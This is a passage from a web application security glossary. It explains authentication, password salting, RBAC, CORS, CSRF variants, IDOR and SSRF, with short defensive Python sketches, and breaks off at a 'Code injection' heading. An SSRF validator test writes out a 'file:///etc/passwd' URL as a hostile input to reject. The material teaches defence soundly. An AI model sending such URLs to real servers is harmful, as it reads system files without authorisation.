Introduction
This page lists various terms related to securing data in transit, securing data at rest, and securing web service requests. Note that the list of concepts on this page is not exhaustive, and many more tasks are required to completely secure an application: physically securing the servers, setting up firewalls, installing only necessary software, updating/patching software, securing databases with passwords, having a DDoS mitigation strategy, and updating versions of dependency libraries (especially if a new major version is available per the semantic versioning layout) are some examples of tasks that must also be performed. For the purpose of securing data and web requests, the two main concepts in "security", if not the entirety of it, are Authentication and Authorization.
Authentication
An easy way to understand authentication is in the context of a web application. When a web application receives a request from someone / somewhere, the application must identify the entity making the request and also prevent anyone from mistakenly or maliciously assuming the identity of another user. To authenticate an entity is to collect necessary information from them (like a username and password) and successfully relate it to a unique user entry stored on the server, in a database, etc. This ensures that "the entity making a request" is the same as a given "user of the application". If a user cannot be authenticated, then they are marked as an "anonymous" user. Most applications still try to identify an anonymous user by tagging them with the ip-address of the machine from which the request originates, but this identification cannot be trusted, especially for critical operations. Authentication as a topic goes well beyond simply collecting a password, and it is highly instructive to refer to this article at Wikipedia. As the application evolves and becomes more critical, it is highly suggested to enforce stronger authentication, like multifactor authentication (a big and important topic in itself; readers are encouraged to review it separately, even though it is not covered in this book). Note that even though the above article discusses the "authentication" concept, it has a section towards the end titled "authorization". For this book, authentication and authorization are treated as separate concepts.
Password strength
See the article about password strength at Wikipedia. The username and password combination has been the most commonly used method of authenticating an entity. The username, being public facing, can be easy to guess, and so the burden of preventing a compromised authentication comes down to having a strong password. A strong password must be used at all times wherever one is asked for, with different passwords for different systems, and passwords should be changed regularly, at least after a major breach at any other company. A password manager can be of great help and should be used as much as possible. Do note to keep separate password managers for personal and work use, so that you don't unexpectedly lose access to one or the other.
Salting
See details about password salting here and here. Password salting must be used whenever storing a user's password. It provides the benefit that, in case of a data leak / website breach, a salted password prevents the raw password text provided by a user from being leaked; and for normal use, having a salted password does not hinder the authentication process. It involves adding a random string of 32 or more characters to a password and then hashing the result. However, salted passwords must also be iteratively hashed multiple times for this protection to work. Bcrypt is a good algorithm to use for salted password hashing. MD5 and SHA must be avoided.
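The salt-then-iteratively-hash idea described above can be sketched with Python's standard library PBKDF2 function (bcrypt, as recommended, is a third-party library; PBKDF2 is used here only so the example is self-contained):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None, iterations=100_000):
    """Salt and iteratively hash a password; returns (salt, digest)."""
    if salt is None:
        salt = os.urandom(32)  # 32 random bytes, unique per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password, salt, digest, iterations=100_000):
    """Re-compute the hash with the stored salt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)

# Only (salt, digest) is stored server-side; the raw password never is.
salt, digest = hash_password("correct horse battery staple")
assert verify_password("correct horse battery staple", salt, digest)
assert not verify_password("wrong guess", salt, digest)
```

Note that a leaked `(salt, digest)` pair still forces an attacker to brute-force each user's password individually, which is the benefit salting provides over plain hashing.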
Authorization
See the article about authorization at Wikipedia. While authentication relates to matching the entity making a request with the user details stored in the application, authorization relates to preventing the verified user or anonymous user from accessing data that they aren't allowed to access, or from performing any disallowed action on the data. By definition, authorization must happen only after the authentication step has been completed.
Permission bits
See details about permission bits usage in setting traditional unix file permissions in this article at Wikipedia and NERSC. Permission bits give the user the flexibility to configure directory and file permissions. Different permissions allowing read/write/execute, or combinations of them, can be set for the file owner, the group that the file belongs to, and for everyone else. Similar permissions can also be set for directories (however, the execute permission on a directory has different implications than the execute permission on a file).
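On a POSIX system, the owner/group/other permission triplets can be set and inspected from Python; a minimal sketch (the `0o754` mode, i.e. rwxr-xr--, is just an example value):

```python
import os
import stat
import tempfile

# Create a scratch file and set permissions rwxr-xr-- (owner/group/other = 7/5/4).
fd, path = tempfile.mkstemp()
os.close(fd)
os.chmod(path, 0o754)

# Read the permission bits back out of the file's mode.
mode = stat.S_IMODE(os.stat(path).st_mode)
assert mode == 0o754
assert mode & stat.S_IRWXU == stat.S_IRWXU          # owner: read/write/execute
assert mode & stat.S_IRGRP and not (mode & stat.S_IWGRP)  # group: read but not write
os.remove(path)
```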
Access control list, or ACL
See the article about ACLs at Wikipedia. An example of an ACL can be seen here. ACLs take the behavior of the "permission bits" described above to a more granular level. Different permissions can be set for individual users or groups. The permission corresponding to the first matching entry in the list is ascribed to the user.
Securing data in transit
See the article about data in transit at Wikipedia. Data in transit refers to data that flows over a network, either a public or untrusted network such as the Internet, or the confines of a private network such as a corporate or enterprise Local Area Network (LAN). The following quick references can be used to identify ways to secure data in transit (here and here). For a web application, the quickest way to secure data in transit is to use HTTPS rather than HTTP for communication.
Man-in-the-middle attack, and need for HTTPS
See articles about the man-in-the-middle attack at Wikipedia and Norton. Using HTTP for communication and not encrypting data transferred between the client and server can allow someone to snoop on the traffic and also modify it. Using HTTPS (references: Wikipedia, Cloudflare) encrypts the data communicated between client and server and thwarts these attacks. Search engines (like Google) have also started giving higher rankings to web applications served over HTTPS. While encryption / decryption does add some extra CPU cycles, these are still much faster than database and network latencies, which are the dominant factors contributing to response latency. Thus, "efficiency" is not a valid rationale for skipping HTTPS configuration (Reference: Cloudflare). Similarly, communication with different microservices within the organization, or with third-party api(s), should also be done using HTTPS and not HTTP.
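The client side of the MITM defence is certificate verification. A small sketch using Python's `ssl` module shows the settings an HTTPS client relies on; downgrading either of them reopens the man-in-the-middle hole:

```python
import ssl

# create_default_context() configures a context suitable for HTTPS clients:
# the server's certificate is verified against trusted CAs, and the
# certificate's hostname must match the host being contacted.
ctx = ssl.create_default_context()
assert ctx.verify_mode == ssl.CERT_REQUIRED
assert ctx.check_hostname is True

# A client that sets verify_mode = CERT_NONE (or check_hostname = False)
# will happily talk to an attacker presenting a forged certificate.
```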
DNS over HTTPS
Domain Name System, or DNS (reference: Wikipedia, Cloudflare), is a decentralized naming system for websites that translates understandable and memorizable text addresses into the ip-addresses used by computers. When a client initiates a web request, the initial call made is to DNS servers (see here for more details on domain name resolution), after which the subsequent HTTP/HTTPS communication with the target server occurs. The initial communication with the DNS is traditionally done in plaintext (over UDP/TCP port 53), which can allow internet service providers (i.e., the company that provides you the internet service) to perform a "man-in-the-middle" attack and learn which websites you (i.e., the client making the web request) are visiting. This can be alleviated by performing the initial DNS call over HTTPS, which is called DNS over HTTPS. For additional details on DNS security, refer to this article at Cloudflare. Another alternative is for companies to host their own DNS servers to enable communication between different internal microservices and resources, and also to identify/control allowed third party api calls.
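As an illustration, a DNS-over-HTTPS client can query a public DoH resolver over plain HTTPS. The sketch below only builds the query URL for Cloudflare's JSON DoH endpoint (an assumption for illustration; a real client would send it over HTTPS with an `accept: application/dns-json` header and parse the JSON answer):

```python
from urllib.parse import urlencode

def doh_query_url(name, record_type="A"):
    """Build a query URL for a JSON-based DNS-over-HTTPS resolver.
    The resolver endpoint below is Cloudflare's public DoH service."""
    base = "https://cloudflare-dns.com/dns-query"
    return base + "?" + urlencode({"name": name, "type": record_type})

url = doh_query_url("example.com")
assert url == "https://cloudflare-dns.com/dns-query?name=example.com&type=A"
```

Because the lookup travels inside an ordinary HTTPS connection, an on-path observer sees only that the client contacted the resolver, not which name was resolved.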
Securing data at rest
See articles about data at rest at Wikipedia and Microsoft Azure. Data at rest refers to data that is housed physically on computer data storage in any digital form, including both structured and unstructured data. For a business application, it can include, among other things, database entries, files, logs, emails and alerts containing user data. If a server filesystem is duplicated (for example using RAID, or a combination of cloud storage), then the "data at rest" definition covers data stored at all such places. Securing data at rest primarily relies on password-protecting access to the corresponding resource and ensuring proper file permissions. On a per case basis, the operating system (or OS) can be configured to encrypt all data being written onto the filesystem. Alternatively, the application may itself encrypt the data before sending it to the OS. Other precautions include storing a hash value rather than plaintext when doing so serves the purpose, stricter access restrictions, and auditing of users who retrieve / modify this information. The goal is to keep a close watch on sensitive data and to have it be unusable by attackers even if the data is stolen.
Data disposal
As shown in an example in the filesystem section of the storage glossary, simply issuing a delete command for a file does not actually remove it from the filesystem, and it is possible to retrieve previously deleted data back from the disk. As explained in articles here and here, this is a security vulnerability, and businesses must take appropriate steps to ensure that data has been truly purged from the disk or storage device before it is discarded.
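A best-effort software-level disposal is to overwrite a file's bytes before unlinking it, sketched below. Note the heavy caveat: on journaling filesystems, SSDs with wear leveling, or snapshotting storage this does NOT guarantee erasure; full-disk encryption or physical destruction is the reliable route:

```python
import os

def overwrite_and_delete(path, passes=1):
    """Overwrite the file's contents with random bytes, flush to disk,
    then unlink it. Best effort only -- see caveats above."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(os.urandom(size))
            f.flush()
            os.fsync(f.fileno())  # push the overwrite past OS buffers
    os.remove(path)

with open("secret.txt", "wb") as f:
    f.write(b"credit card: 4111-1111-1111-1111")
overwrite_and_delete("secret.txt")
assert not os.path.exists("secret.txt")
```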
Encryption and key rotation
See articles about key rotation at Cryptomathic, Google Cloud and AWS. Encrypting sensitive data in the database is the best way to ensure that it is not available to just anyone with access to the database. Since encryption keys are used to encrypt the data, it becomes important to secure the keys themselves. Rotating the encryption key ensures that in the case of a leak, the damage is contained and not all sensitive user data is compromised.
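The mechanics of rotation can be sketched by storing a key id alongside each ciphertext; rotating means decrypting with the old key and re-encrypting with the new one. The XOR "cipher" below is a deliberately toy stand-in (NOT real encryption) so the example stays dependency-free; a real system would use an authenticated cipher such as AES-GCM:

```python
import os

def xor_cipher(data, key):
    """Toy XOR 'cipher' for illustration only -- NOT real encryption."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Each stored record carries the id of the key that encrypted it.
keys = {1: os.urandom(16)}
record = {"key_id": 1, "ciphertext": xor_cipher(b"ssn=123-45-6789", keys[1])}

def rotate(record, keys, new_key_id):
    """Key rotation: decrypt with the record's old key, re-encrypt with a new key."""
    plaintext = xor_cipher(record["ciphertext"], keys[record["key_id"]])
    keys[new_key_id] = os.urandom(16)
    return {"key_id": new_key_id, "ciphertext": xor_cipher(plaintext, keys[new_key_id])}

record = rotate(record, keys, new_key_id=2)
# Data remains recoverable under the current key; key 1 can now be retired.
assert xor_cipher(record["ciphertext"], keys[2]) == b"ssn=123-45-6789"
```

Storing the key id with each record is what lets rotation happen gradually, without re-encrypting the whole database in one pass.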
Securing web service request
Securing a web service entails: authenticating the entity performing the request and identifying them as an existing user or an anonymous user; verifying that the authenticated user is authorized to perform the action they are attempting; and ensuring that if the server communicates with any other infrastructure component while processing the user request, it does not inadvertently perform any unauthorized actions on behalf of the user.
Authentication security of web request
HTTP requests are in themselves stateless. The way an HTTP request gets processed by the server does not depend on what previous requests were made or what their outcomes were. In the context of authentication, this means that each HTTP call must carry authentication information, and the server will individually authenticate every request before it is processed. While it is possible to send authentication details in the request body, doing so is discouraged because GET calls do not carry a request body, so other means for sending authentication details would be needed at least for GET calls! A better alternative is to send authentication details via a request header. Various ways to authenticate a request using a request header are discussed below. Note that since a user session is created after a successful authentication, the various tools provided by modern web application frameworks for managing user sessions help in preventing session related attacks, like session fixation.
Basic authentication
See articles about basic authentication at Wikipedia, Mozilla docs and Swagger docs. The authentication information is sent in the Authorization request header, and the corresponding header value starts with the Basic prefix. NOTE, to avoid confusion: the authentication details are sent in a request header named "Authorization", contrasting with the fact that for this book, authentication and authorization are two separate concepts. Also note that this authentication method MUST only be considered when making requests over a secure HTTPS connection, else someone can listen to the request and get access to the header and, through it, to the raw text password. Collecting the username and password, combining them in the format expected for basic authentication, and then sending the result with every call is the responsibility of the platform from where the call is made.
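The expected format is `Basic` followed by the base64 encoding of `username:password`, which can be built in a couple of lines:

```python
import base64

def basic_auth_header(username, password):
    """Build the Authorization header value for HTTP Basic authentication:
    'Basic ' + base64('username:password')."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"

# base64 is an encoding, not encryption: anyone who sees this header can
# decode the raw password, which is why HTTPS is mandatory.
assert basic_auth_header("user", "pass") == "Basic dXNlcjpwYXNz"
```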
Bearer authentication (or Token authentication)
See the article about bearer authentication at Swagger docs. It is similar to basic authentication in that the authentication information is sent in the Authorization request header. However, here the corresponding header value starts with the Bearer prefix. Some web applications may instead use the Token prefix. For bearer authentication, an access code or token is provided in the header, with the understanding that anyone holding that code is identified as the same user by the server. Either when the account is created for the first time, or after every password reset, or after every login (depending on how the web application is designed), the server can send a token back to the authenticated user, and subsequent requests can then use the token for authentication. An advantage over basic authentication is that any attack or accidental slip-up will reveal only the token associated with the user, not the username and password. Any compromised token can be discarded and a new one regenerated.
Cookie based authentication
In modern times, most requests to web services originate from web browsers, like Chrome, IE, Firefox, etc. Browsers are designed with some additional features that are not part of the HTTP specification. One such behavior is that the cookie header associated with a domain is sent back to the server automatically in every request. For more details, see the glossary section on cookies. This allows using cookies for authentication, where the server sets a session-id cookie on the user's browser after the user has successfully authenticated themselves. Any subsequent request made from the browser will then send all the cookies back to the server, including the session-id, and the server can use it to authenticate the user. NOTE that relying only on cookies for authentication is not a secure practice and must be avoided; for more details see the section below on the CSRF attack.
Token vs cookie based authentication
Token based authentication has some key advantages when compared to cookie based authentication. A few differences between the two are discussed here. An advantage of using cookies is that they are a mature concept, and web application developers on the frontend and backend don't have to write and maintain custom code to manage them. With tokens, emulating behavior similar to cookie path, max-age and other attributes requires additional code; storing tokens for reuse and finally deleting them requires additional effort from developers, whereas this is done automatically for cookies by web browsers. On the other hand, using a token has some advantages over using a cookie. Since a cookie defines a user session on a single browser communicating with one server on a given domain, if the domain server needs to communicate with other domains, or if the webpage on the browser needs to communicate with other websites, then the same cookie cannot be used. A token, however, can be reused among different systems, as long as each of them understands how to process the token. Unlike a cookie, a token can also be copied from one browser to another on the same or a different computer, allowing a user to "move" their session from one system to another. The encryption key used for creating tokens can be rotated (reference) to achieve stronger levels of application security, which is not possible with a cookie.
The best of both can be achieved by carrying a token in a cookie. For example, configuring "sticky session" behavior (Reference: StackOverflow) by storing the complete session information in a cookie, or by using a shared backend database to look up the user details corresponding to a session-id cookie. Doing so allows the application to be "cloud-ready", where the user experience does not suffer if the server handling the user request suddenly breaks down, or if the user request is routed to a different server. Note that achieving sticky sessions by routing user requests to the same server is not a "cloud-ready" solution and should be avoided if possible.
Custom authentication headers
Web applications may choose to define and use custom request headers for authenticating users; nothing in the HTTP specification disallows doing so. As described below in the section on the CSRF attack, a custom header carrying the same value as that passed in a cookie is a good way to prevent a CSRF attack.
Authorization security of web request
This section covers various security issues in processing a web request that can arise if a request is not properly authorized.
Role based access control, or RBAC
See the article about RBAC at Wikipedia. Note that RBAC is not a third party software; instead it is an access-control mechanism or architecture defined around roles and privileges, and hence RBAC implementations can vary for different businesses. In the RBAC architecture, "roles" are identified, and access to business resources (for example, access to REST endpoints) is authorized for the corresponding roles. Each user is associated with one or more roles, and can only access the resources authorized for those roles. RBAC also allows a hierarchical relation among the roles. RBAC authorization is easier to manage at the corporate level because a user simply needs to be added to / removed from the appropriate role to ensure their authorized interaction with the system; for this reason it is preferred over maintaining ACLs (reference: here and here).
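The role-to-permission indirection described above can be sketched in a few lines; the role names, permission strings and users below are made up for illustration:

```python
# Hypothetical role -> permission mapping (permission names are assumptions).
ROLE_PERMISSIONS = {
    "admin": {"user:read", "user:write", "report:read", "report:write"},
    "analyst": {"report:read"},
    "support": {"user:read"},
}

# Users are assigned roles, never individual permissions.
USER_ROLES = {"alice": {"admin"}, "bob": {"analyst", "support"}}

def is_authorized(user, permission):
    """A user is authorized if any of their roles grants the permission."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

assert is_authorized("alice", "user:write")
assert is_authorized("bob", "report:read")
assert not is_authorized("bob", "report:write")
```

Revoking bob's reporting access is a single change to `USER_ROLES`, which is exactly the manageability benefit RBAC offers over per-user ACL entries.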
Rate limiting, or Throttling
See articles about throttling at Wikipedia and AWS. Throttling can be seen as a time-based authorization process wherein a user is disallowed from accessing an API (or certain subsections of it) at a higher rate than an allowed value. From a business viewpoint, the most likely case for applying throttling is to enforce API access bounds set by the payment tier subscribed to by the user. Another important use case is to control the access rate to resource-intensive APIs and prevent the system from becoming unresponsive.
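One common way to implement such a rate limit is a token bucket, sketched below (the clock is passed in explicitly rather than read from `time.time()` so the behavior is deterministic; capacity and rate are example values):

```python
class TokenBucket:
    """Token-bucket rate limiter: up to `capacity` burst requests, refilled
    at `refill_rate` tokens per second; each request consumes one token."""
    def __init__(self, capacity, refill_rate, now=0.0):
        self.capacity = capacity
        self.refill_rate = refill_rate
        self.tokens = capacity
        self.last = now

    def allow(self, now):
        # Refill proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.refill_rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(capacity=3, refill_rate=1.0)  # burst of 3, then 1 req/sec
assert [bucket.allow(0.0) for _ in range(4)] == [True, True, True, False]
assert bucket.allow(1.0)  # one token refilled after a second
```

A denied request would typically be answered with HTTP status 429 (Too Many Requests).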
OpenID and OAuth
See the article about OpenID at Wikipedia. OpenID was designed to be a decentralized authentication protocol that allows users to be authenticated by a trusted third party service. This eliminates the need for various web applications to provide their own ad hoc login systems and store user credentials. Instead, OpenID allows users to log into multiple unrelated websites without having a separate identity and password for each. However, with the rise of companies like Google, Facebook and Twitter, and the ecosystem of specific products and services offered by each, the user expectation is no longer limited to having a centralized authentication. When visiting a third party website, a user now wants the ability to log in from the third party website to Google but only to make a calendar entry, or to log into Facebook but only to make a post on their wall. This requirement gave rise to OAuth, which is an open standard for access delegation, commonly used as a way for users to grant websites or applications access to their information on other websites (like Google, Facebook, etc.) without giving them the corresponding passwords. For more details on how OAuth is implemented, see articles here, here and here. Hence, the "Auth" in OAuth is actually "authorization", as in, it authorizes a third party to access user profile and services on host websites (like Google, Facebook, etc.). However, in doing so, the authorization provided is granular down to the user level, and so OAuth can also be used for authentication purposes (see here). This idea is formalized in OpenID Connect. Note that as of this writing, OAuth has 2 versions, and it is suggested to use the most recent one, i.e., OAuth2, for any development.
Insecure direct object references, or IDOR
See details about IDOR at OWASP, including ways to prevent it. IDOR occurs when an application provides direct access to objects based on user input, without performing sufficient authorization checks. As a result of this vulnerability, attackers can bypass authorization and access resources in the system directly, for example database records or files. It can involve taking a filesystem path from the user to retrieve file information without checking whether the user is allowed to access the file, or even returning files from a directory containing system data rather than user data. Another example is returning database entries by reading one or more path and/or query parameters without verifying whether the user is allowed to access the particular data, even if the user's role allows them to access the general service. For example, consider a url path /department/sales/employee/{employee-id} that allows a manager from the sales department to view the records of the employee with id = {employee-id}. If the service only verifies that the user is a sales manager and authorizes them to use the above url path for any employee-id, regardless of whether the employee belongs to the sales department or not, then that is an IDOR vulnerability.
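The fix is an object-level check in addition to the role check; a minimal sketch of the employee-records example (the data store and status strings are invented for illustration):

```python
# Hypothetical data store: which department each employee belongs to.
EMPLOYEE_DEPARTMENT = {101: "sales", 102: "engineering"}

def get_employee_record(requesting_manager_dept, employee_id):
    """Handler for /department/{dept}/employee/{employee-id}. Verifying the
    caller's role is not enough; the requested object must be checked too."""
    dept = EMPLOYEE_DEPARTMENT.get(employee_id)
    if dept is None:
        return ("404 Not Found", None)
    if dept != requesting_manager_dept:
        # Without this object-level check, the endpoint is an IDOR hole.
        return ("403 Forbidden", None)
    return ("200 OK", {"id": employee_id, "department": dept})

assert get_employee_record("sales", 101)[0] == "200 OK"
assert get_employee_record("sales", 102)[0] == "403 Forbidden"  # IDOR blocked
```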
Additional security issues
This section covers other common security issues seen during web application development. Web application developers must aim to identify and prevent these vulnerabilities. By following suggested best practices during code development, along with proper code reviews, most of these issues, if not all, can be identified and mitigated.
Useful security response headers
From personal experience, I very much appreciate the default security headers added to the response by Spring Security. Not all headers may be suitable for every web application, but it is a good list of security response headers to review and tweak as necessary. In particular, the default values for these headers (except those for caching responses) can be used as-is, i.e., X-Content-Type-Options: nosniff, Strict-Transport-Security: max-age=31536000; includeSubDomains, X-Frame-Options: DENY, and X-XSS-Protection: 1; mode=block. It is highly suggested to also review and set the content security policy (shown here) and referrer policy (shown here) response headers.
Cross-origin resource sharing, or CORS
See articles about CORS at Wikipedia and Mozilla. In building a web application, it is common practice to use resources or services provided by a third party domain rather than spending time, effort and money duplicating the service. CORS is an HTTP-header based mechanism that allows the third party domain / server to indicate any origins (domain, scheme, or port) other than its own from which a browser should permit loading resources. Performing AJAX requests is a popular way to request resources from another website. However, these requests can occur in the background, without the user knowing when one is happening or even without waiting for them to provide any input. To protect an unsuspecting user visiting a webpage from malicious cross-origin calls made automatically by the scripts on the page, browsers restrict all cross-origin HTTP requests initiated from scripts, as per the default same-origin security policy. CORS settings are applied on the server side by adding response headers that identify which other domains are allowed to make cross-origin requests to it and which methods are allowed. These response headers are: Access-Control-Allow-Origin, Access-Control-Allow-Methods, Access-Control-Allow-Headers, and Access-Control-Max-Age.
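A sketch of the server-side half: a helper a server might use to build the CORS response headers for an allowed origin (the origin list and allowed methods/headers below are assumptions for illustration):

```python
# Hypothetical allow-list of origins permitted to make cross-origin calls.
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}

def cors_headers(request_origin):
    """Return the CORS response headers if the origin is allowed, else none."""
    if request_origin not in ALLOWED_ORIGINS:
        return {}  # no CORS headers -> the browser blocks the cross-origin call
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Methods": "GET, POST, OPTIONS",
        "Access-Control-Allow-Headers": "Content-Type, Authorization",
        "Access-Control-Max-Age": "86400",  # let the browser cache the pre-flight
    }

assert cors_headers("https://evil.example.net") == {}
assert cors_headers("https://app.example.com")["Access-Control-Allow-Origin"] \
    == "https://app.example.com"
```

Note that the enforcement happens in the browser, not the server: CORS protects users from malicious pages, not the server from malicious clients.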
For developers, CORS is one of those issues that sneaks in totally unexpectedly. If you are in a time-pinch to develop something that will not be deployed to users and CORS is preventing progress, then the problem can be bypassed using Chrome's ModHeader plugin; see here.
Request forgery attacks
A request forgery attack is when the attacker sends a request that looks/behaves as if it was made by a valid user. The three attacks discussed below are CSRF, login CSRF and SSRF. Of these, CSRF is the most common and a top-level vulnerability in many applications.
Cross-site request forgery, or CSRF, or XSRF
See details about CSRF at Wikipedia, OWASP and the Spring security docs. To understand the CSRF attack and prevention techniques, one must first understand cookies, how browsers use cookies, how cookies can be used for authentication, and CORS. Primarily, CSRF attacks exploit the property of web browsers that they automatically include any cookies associated with a domain in any web request sent to that domain. This is done regardless of whether the request originates from the user opening a new tab and typing a url, from the user clicking a link to the domain on some third party website, or from a call made by a script running on a webpage hosted either under the same domain or under a different domain. It is the last case that enables a CSRF attack, where (1) a script running on some third party domain is able to make a web request to another target domain, (2) when this request is made, the browser automatically sends the cookies associated with the target domain, (3) at least one of the cookies that is automatically sent is used by the target domain for authentication, (4) all of the above happens without the user knowing about it, and (5) all of the above happens despite the CORS settings on the target domain.
To avoid a CSRF attack, one option is to not create any user session at all and not use cookies in any manner. A purely stateless, cookie-free, REST based communication is free from CSRF attacks. However, this may not always be possible, in which case the best solution for preventing a CSRF attack is to double submit the value in a cookie, i.e. require a header containing the same data as is present in the cookie; an example is shown in this article. Another article describes why CSRF tokens are necessary; CSRF tokens are an implementation of the double submit cookie pattern. Note that this solution relies on the use of HTTPS, on safe HTTP methods not executing side effects, on proper CORS settings on the server, and on not having any XSS vulnerability. For more details on CSRF prevention, see the OWASP Cheatsheet. Also, as much as possible, the cookies set by the web application should be secured as suggested here.
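The server-side check for the double submit pattern is small; a minimal sketch (function names are my own):

```python
import hmac
import secrets

def issue_csrf_token():
    """Generate an unguessable token. The server sets it in a cookie, and the
    frontend must echo it back in a custom request header (double submit)."""
    return secrets.token_urlsafe(32)

def is_request_allowed(cookie_token, header_token):
    """A forged cross-site request carries the cookie automatically, but the
    attacker's page cannot read the cookie to copy its value into a header,
    so the two values only match for the legitimate frontend."""
    return bool(cookie_token) and hmac.compare_digest(cookie_token, header_token)

token = issue_csrf_token()
assert is_request_allowed(token, token)   # legitimate frontend echoes the cookie
assert not is_request_allowed(token, "")  # forged request: cookie sent, header absent
```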
- In trying to understand CSRF attacks, I personally feel that the examples available on the internet don't do a complete job of explaining the various details. This list attempts to provide additional details on CSRF attacks. For reference, let's use the CSRF attack example in the Spring security docs, in which the double submit cookie is not set.
- Let's say that the website with the CSRF-insecure page uses a cookie for authentication that has the samesite=strict setting. In this case, even without using a double submit cookie, the CSRF attack will fail. However, not all browsers implement the "samesite" setting (see browser compatibility), so it is a good idea to still use the double submit cookie. Additionally, if the frontend and backend are hosted on different domains, then it is not possible to use the samesite=strict setting, otherwise communication between the two will break.
- The samesite=strict cookie setting may break some website features, and from a business perspective it may be preferable to instead use the samesite=lax cookie setting. Although the latter setting restricts the cases in which a cookie can be sent, it is still not a fool-proof way to avoid a CSRF attack because applications may not be designed properly, executing sensitive commands on a GET request, as mentioned here. So, it is still a good idea to use the double submit cookie pattern.
- Let's say the CORS policy on the target server is set such that it only allows requests from a particular origin, and requests originating from the attacking website's origin are not allowed. Let's also say that the attacking script makes a simple request to the target server, and that a credentialed request is made to ensure that cookies are sent with the cross-origin request. Let's assume the samesite setting is not used on the cookie. In this case, is the double submit cookie necessary? Yes! In the way cross-origin simple requests are executed by a browser, no pre-flight request is made. Instead, the cross-origin request is sent to the server, and any response obtained from the server is discarded by the browser. The important thing to note is that even though the server response is discarded by the browser, the server still successfully executes the request sent to it by the script on the attacking website. Hence, the attack is successful! And so, the double submit cookie pattern must be used on the target server to prevent this attack.
- Let's consider the above example, but with a non-simple request made by the script running on the attacking website. In this case, is the double submit cookie necessary? No! For such cases, the browser performs a pre-flight request before executing the desired cross-origin request. The response to the pre-flight request lets the browser know that the attacking website is disallowed from making cross-origin requests to the target website, and so the browser will not make the desired attack request. Thus, it is not necessary to use the double submit cookie pattern because no request will be made.
- Let's consider the same example of making a cross-origin request, but now the target server allows requests from two domains, domain-1.com and domain-2.com. In this case, is the double submit cookie on the target website necessary to ensure that a CSRF attack initiated by a script hosted on domain-2.com against a user authenticated on domain-1.com does not succeed? Yes! If this scenario is allowed to proceed, it plays out as a classic CSRF attack. However, the thing to notice in this case is that, unlike the above scenarios, the response from the CORS request will not be rejected by the browser, because domain-2.com is an allowed origin for making cross-origin requests to the target website. Thus, if the CORS settings on the target website allow multiple or all origins (i.e., *), then the double submit cookie pattern also prevents CSRF attacks on GET requests that might reveal a user's private data to an attacker, in addition to the usual case of preventing CSRF attacks on POST requests that create new data or induce side effects.
Login CSRF
Login CSRF is a CSRF attack done on the login page. Unlike other CSRF attacks, where the user is already logged in and the attacker's goal is to send a forged request that appears to come from the user, in a login CSRF the attacker's goal is to have the user log into a forged account without realizing that it does not belong to them. Any information added to this account is then available to the attacker. This StackOverflow post nicely describes the progression of a login CSRF attack and why it is considered an "attack" even though the target user never logged into their own account via the compromised login step. When coupled with a logout CSRF attack, a login CSRF can become an even more troubling issue, as shown here.
This OWASP article section provides suggestions for fixing the login CSRF problem without running into a session fixation attack. A major difference between login CSRF and a normal CSRF attack is that the login step involves setting a new cookie which was previously absent, while other CSRF attacks try to reuse a cookie already in the browser. This is why defeating a login CSRF attack involves setting a session even for anonymous users. A similar suggestion for fixing the login CSRF attack is also provided in this different article.
Server-side request forgery, or SSRF
See details about SSRF at Wikipedia, OWASP. Consider a scenario where a web application, named WA1, accepts a URL from the user in the request body. As part of processing the request, the server should download the file from the provided URL if the user is authorized to view it, and finally send the file contents back to the user in the response. Now consider that the business hosting this application also runs another application, named WA2, managing internal files that must not be made available to outside users. An SSRF attack occurs if an attacker calls WA1 with a URL pointing at WA2, asking it to retrieve internal files. The attack succeeds if WA1 requests the internal file from WA2 and authenticates itself as WA1, which is an internal user, rather than as the external user who initially made the call to WA1. WA2 does not raise an error because WA1 is an internal user, and returns the internal file, which WA1 then passes back to the attacker. Had the attacker called WA2 directly, the request might have failed, but it does not fail when routed via WA1. Hence, an SSRF attack can be seen somewhat as an IDOR attack during internal server-to-server communication, caused by failing to propagate the proper user authentication from one server to another. Resolving such issues requires ensuring that whenever there is a chain of requests, the incoming authentication credentials are the ones used in subsequent requests, and are not overwritten by new authentication credentials. As mentioned earlier, the token used in token-based authentication in the very first request from the external user can be reused by all other chained requests to avoid this attack. This assumes there is an enterprise-level authentication system that the various applications running within the organization can use to identify the user corresponding to a token.
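A common complementary defence in WA1 is to validate the user-supplied URL before fetching it at all. A minimal sketch of such a check is below; the allowlisted host is a made-up example, and a production check would need to cover more cases (redirects, IPv6, DNS rebinding):

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Hypothetical allowlist of external hosts WA1 may fetch from.
ALLOWED_HOSTS = {"files.example.com"}

def is_url_safe_to_fetch(url: str) -> bool:
    """Reject URLs pointing at internal services before fetching them."""
    parsed = urlparse(url)
    if parsed.scheme not in {"http", "https"}:
        return False  # e.g. file:// or gopher:// must never be fetched
    host = parsed.hostname
    if host is None or host not in ALLOWED_HOSTS:
        return False
    # Resolve the host and reject private/loopback addresses so a DNS
    # entry cannot smuggle in an internal target.
    try:
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)

assert not is_url_safe_to_fetch("http://intranet.local/secret")
assert not is_url_safe_to_fetch("file:///etc/passwd")
```

Note that this check controls only which URLs WA1 will fetch; propagating the external user's token, as discussed above, is still needed so WA2 can make its own authorization decision.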
Code injection
